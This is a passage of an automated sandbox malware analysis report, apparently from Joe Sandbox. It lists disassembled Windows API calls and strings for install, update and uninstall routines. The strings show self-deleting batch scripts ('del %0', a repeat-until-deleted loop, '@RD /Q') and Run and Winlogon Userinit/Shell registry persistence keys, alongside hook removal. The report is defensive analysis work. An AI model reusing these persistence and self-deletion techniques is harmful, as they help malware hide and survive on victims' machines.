                              • SetFileAttributesA.KERNEL32(00000000), ref: 0040672C
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000007), ref: 00406744
                              • SetFileAttributesA.KERNEL32(00000000), ref: 0040674B
                              • getenv.MSVCRT ref: 0040675B
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00406766
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406771
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040677D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406786
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040678F
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040679C
                              • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 004067A9
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,PING 127.0.0.1 -n 2 ), ref: 004067C1
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(0041580C,?,00410860,00410EC8), ref: 004067E7
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(del ,?,00410860,00000000), ref: 004067FB
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406806
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00406813
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(00000001,00000000), ref: 00406820
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040682D
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 0040683A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406845
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040684E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406857
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406860
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406869
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406872
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410860,?,00410EC8), ref: 00406881
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(start "" ,?,00410860,004157D0,00000000), ref: 0040689A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004068A5
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004068B2
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004068BF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004068CC
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 004068D9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004068E4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004068ED
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004068F6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004068FF
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406908
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406911
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,del %0 ), ref: 00406923
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,exit ), ref: 00406931
                              • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040693C
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410668,00410668,00000000), ref: 0040694F
                              • ShellExecuteA.SHELL32(00000000,open,00000000), ref: 0040695C
                              • exit.MSVCRT ref: 00406968
                              • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00406974
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040697D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$V10@V?$basic_string@$D@2@@0@Hstd@@$?c_str@?$basic_string@$??0?$basic_string@$D@1@@$??4?$basic_string@??6std@@D@std@@@0@V01@V01@@V?$basic_ostream@$File$D@std@@@std@@V10@0@$AttributesCopyD@2@@0@@$??0?$basic_ofstream@?close@?$basic_ofstream@CreateD?$basic_ofstream@DirectoryExecuteShellexitgetenv
                              • String ID: Ox@$PING 127.0.0.1 -n 2 $Temp$\install.bat$del $del %0 $exit $open$start ""
                              • API String ID: 3747557075-3575361830
                              • Opcode ID: debd270ebac2bb5bb204475dcb5e697f56e708a94e9d501d83d58abb2228746f
                              • Instruction ID: 3a0a7e291378ef6016657a3b256388cc9313874f64008c8d2928daba6d98e237
                              • Opcode Fuzzy Hash: debd270ebac2bb5bb204475dcb5e697f56e708a94e9d501d83d58abb2228746f
                              • Instruction Fuzzy Hash: C8D1507190011EEBCB10ABA0EC5DDEE7B7CFB54304B044476F516E2191EEB89A99CB68

                              Control-flow Graph: function starting at 406d29 (executed / not executed graph data omitted)
                              APIs
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415918,00410668,76F93520), ref: 00406D6B
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415918,00410668,76F93520), ref: 00406D90
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(explorer.exe,?,00000001,00415918,00410668,76F93520), ref: 00406DBF
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe,?,00000001,00415918,00410668,76F93520), ref: 00406DED
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415918,00410668,76F93520), ref: 00406E0D
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415918,00410668,76F93520), ref: 00406E29
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00406E32
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,00000000), ref: 00406E4C
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406E73
                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 00406EA2
                                • Part of subcall function 0040524E: TerminateThread.KERNEL32(0040382C,00000000,00415918,00410668,00406D48,00415918,00410668,76F93520), ref: 00405263
                                • Part of subcall function 0040524E: UnhookWindowsHookEx.USER32(00000000), ref: 0040526C
                                • Part of subcall function 0040524E: TerminateThread.KERNEL32(0040380C,00000000), ref: 0040527C
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00406E7D
                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00406E85
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415918,00410668), ref: 00406EB6
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000080), ref: 00406EC8
                              • SetFileAttributesA.KERNEL32(00000000), ref: 00406ECF
                              • getenv.MSVCRT ref: 00406EE4
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00406EEF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406EFA
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406F07
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406F12
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406F1B
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,00000001), ref: 00406F28
                              • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00406F35
                              • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00406F41
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,:Repeat), ref: 00406F61
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,00410F2C), ref: 00406F79
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,del ",00000000), ref: 00406F89
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406F96
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 00406FA3
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406FAE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406FB7
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406FC0
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?," goto Repeat), ref: 00406FDF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,if exist ",00000000), ref: 00406FEF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406FFC
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 00407009
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407014
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040701D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407026
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415918,00410668), ref: 00407032
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,@RD /Q ",00415918,00410F2C), ref: 00407049
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00410F2C), ref: 00407056
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000,?,?,?,?,00410F2C), ref: 00407063
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 0040706E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 00407077
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00410860,?,00410F2C), ref: 0040708B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00410F2C), ref: 00407098
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000,?,?,?,?,00410F2C), ref: 004070A5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070B0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070B9
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,del %0 ,?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070CB
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,exit ,?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070D9
                              • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070E4
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000), ref: 004070F2
                              • ShellExecuteA.SHELL32(00000000,open,00000000), ref: 004070FF
                              • exit.MSVCRT ref: 00407106
                              • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 00407112
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 0040711B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 00407124
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$V?$basic_string@$??1?$basic_string@$V10@$D@2@@0@$Hstd@@$?c_str@?$basic_string@$??6std@@D@std@@@0@V?$basic_ostream@$??0?$basic_string@D@1@@$D@2@@0@@D@std@@@std@@V10@@$File$??9std@@AttributesTerminateThread$??0?$basic_ofstream@?close@?$basic_ofstream@?is_open@?$basic_ofstream@?size@?$basic_string@D?$basic_ofstream@DeleteExecuteHookModuleNameShellUnhookWindowsexitgetenv
                              • String ID: " goto Repeat$:Repeat$@RD /Q "$C:\WINDOWS\system32\userinit.exe$EXEpath$Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$Userinit$del "$del %0 $exit $explorer.exe$if exist "$open$update.bat
                              • API String ID: 3539474836-3658685564
                              • Opcode ID: 5a96464736123f44b41d57e83acd263e9b05569708759541ce9a089a0eb9b578
                              • Instruction ID: 85814611d3c695b275b499f4b080fe16a1c3fdb49b7e8a264d8a5f024fe5fead
                              • Opcode Fuzzy Hash: 5a96464736123f44b41d57e83acd263e9b05569708759541ce9a089a0eb9b578
                              • Instruction Fuzzy Hash: C7B16172940109ABDB10EBA0DD4EEDE7B7DAB54304F1040B7F506B2191DBB89E898B6D

                              Control-flow Graph: function starting at 406988 (executed / not executed graph data omitted)
                              APIs
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415940,6A41AFB0,00000001), ref: 004069CA
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415940,6A41AFB0,00000001), ref: 004069EF
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(explorer.exe,?,00000001,00415940,6A41AFB0,00000001), ref: 00406A1E
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe,?,00000001,00415940,6A41AFB0,00000001), ref: 00406A4C
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415940,6A41AFB0,00000001), ref: 00406A6C
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,6A41AFB0,00000001), ref: 00406A9F
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00406AA8
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000,00000000), ref: 00406AC2
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406AE9
                                • Part of subcall function 0040524E: TerminateThread.KERNEL32(0040382C,00000000,00415918,00410668,00406D48,00415918,00410668,76F93520), ref: 00405263
                                • Part of subcall function 0040524E: UnhookWindowsHookEx.USER32(00000000), ref: 0040526C
                                • Part of subcall function 0040524E: TerminateThread.KERNEL32(0040380C,00000000), ref: 0040527C
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00406AF3
                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00406AFB
                              • getenv.MSVCRT ref: 00406B0F
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00406B1A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406B25
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406B30
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415918,00410668), ref: 00406B46
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000080), ref: 00406B62
                              • SetFileAttributesA.KERNEL32(00000000), ref: 00406B69
                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 00406B77
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 00406B87
                              • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00406B94
                              • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00406BA0
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,:Repeat), ref: 00406BC0
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,00410F2C), ref: 00406BD7
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,del ",00000000), ref: 00406BE7
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406BF4
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 00406C01
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C0C
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C15
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C1E
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?," goto Repeat), ref: 00406C3D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,if exist ",00000000), ref: 00406C4D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406C5A
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 00406C67
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C72
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C7B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C84
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415918,00410668), ref: 00406C8C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,@RD /Q ",00415918,00410F2C), ref: 00406CA7
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00410F2C), ref: 00406CB4
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000,?,?,?,?,00410F2C), ref: 00406CC1
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 00406CCC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 00406CD5
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,del %0 ), ref: 00406CE7
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,exit ), ref: 00406CF5
                              • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 00406D00
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410668,00410668,00000000), ref: 00406D0D
                              • ShellExecuteA.SHELL32(00000000,open,00000000), ref: 00406D1B
                              • exit.MSVCRT ref: 00406D23
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$V?$basic_string@$V10@$??1?$basic_string@?c_str@?$basic_string@D@2@@0@$Hstd@@$??6std@@D@std@@@0@V?$basic_ostream@$??0?$basic_string@D@1@@$D@2@@0@@D@std@@@std@@FileV10@@$??9std@@AttributesTerminateThread$??0?$basic_ofstream@?close@?$basic_ofstream@?is_open@?$basic_ofstream@?size@?$basic_string@DeleteExecuteHookModuleNameShellUnhookWindowsexitgetenv
                              • String ID: " goto Repeat$:Repeat$@RD /Q "$C:\WINDOWS\system32\userinit.exe$EXEpath$Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$Userinit$\uninstall.bat$del "$del %0 $exit $explorer.exe$if exist "$open
                              • API String ID: 2435849188-468332953
                              • Opcode ID: f7b9532450ad24e110554a0111ebd419dfb63accee5f6680732906e11875e649
                              • Instruction ID: 79bb7098ec12771f3f12c2aeb3a0bf44cec98225d0af6e33e903258e68a155bd
                              • Opcode Fuzzy Hash: f7b9532450ad24e110554a0111ebd419dfb63accee5f6680732906e11875e649
                              • Instruction Fuzzy Hash: A8A17172940209ABDB10ABA0DD4AFDE777DEB54304F1040BBF506B2191DAF85EC98B6D

                              Control-flow Graph (graph image not reproduced; entry block 40ca9b-40cae4, edge list omitted)
                              APIs
                                • Part of subcall function 004020E1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00415268,?,?,00403DDD,00000001), ref: 004020EF
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024,00000001,00000001,00000000,6A41AFB0,6A41AFB0), ref: 0040CAC3
